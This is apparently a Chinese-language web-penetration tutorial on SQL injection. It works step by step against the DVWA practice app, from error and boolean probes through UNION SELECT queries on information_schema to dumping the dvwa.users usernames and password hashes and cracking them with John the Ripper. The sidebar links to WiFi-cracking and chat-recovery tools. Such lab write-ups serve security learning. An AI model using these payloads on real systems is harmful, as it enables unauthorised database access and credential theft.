评分

Web渗透_SQL注入1

1年前发布

240

SQL注入

服务器端程序将用户输入参数作为查询条件，直接拼接SQL语句，并将查询结果返回给客户端浏览器；

基于报错的检测方式

' " % ()

基于布尔的检测

- 1’and’1’=’1 / 1’and’1
- 1’and’1’=’2 / 1’and’0
- 通过真假去判断是否存在SQL注入

检测查询字段

表列数/显示信息位于哪一列

- ‘order by 9–（–后面加个空格） #按查询列号排序（注释符：–）
- select * 时表字段数=查询字段数

慢慢减少数字，直到不报错为止

联合查询

‘union select 1,2– （–后面加个空格） ##查询哪个是第一个字段哪个是第二个字段
‘union all select database(),2– （–后面加个空格）

当然，我们可以去替换字段去查询一些敏感信息

- ‘union select user(),version()–

除此之外，还可以替换成其他的全局参数

@@datadir    #当前数据库所在位置
@@hostname   #查询当前主机名
@@VERSION   #查询数据库版本
@@version_compile_os--  #查询操作系统
CHAR()  #执行ACSII码转换
md5()  #计算哈希值

连接字符串

- CONCAT_WS(CHAR(32,58,32),user(),database(),version())

注：这个插件叫hackbar，自己去搜下如何使用

查询所有表 / 所有库

‘union select table_name,table_schema from information_schema.tables– ‘

统计库中表的数量

‘UNION select table_schema,count(*) FROM information_Schema.tables group by table_schema —

Dvwa库中的表名

'union select table_name,table_schema from information_schema.tables where table_schema='dvwa' --+  (+

查询Users表中所有列

'union select table_name,column_name from information_schema.columns where table_schema='dvwa' and ta

查询user、password列中的内容

'union select user,password from dvwa.users--+  (+代表空格)

'union select null,concat(user,0x3a,password) from users--+

之后将用户名和密码保存下来

之后去破解密码

john --format=raw-MD5 dvwa.txt

评分

欢迎为Ta评分

赞赏

Web渗透_SQL注入1

检测查询字段

联合查询

查询所有表 / 所有库

统计库中表的数量

Dvwa库中的表名

查询Users表中所有列

查询user、password列中的内容

WEB渗透

标签

分类目录

使用BP证书抓包夜神模拟器

开源工具GoWxDump恢复WX聊天记录

QQ说说恢复工具

安全大佬内部学习笔记曝光，这也太牛了吧！（附完整版PDF）

WiFi破解工具用Fluxion抓WPA2握手包

破解WIFI密码Aircrack-ng抓包具体过程演示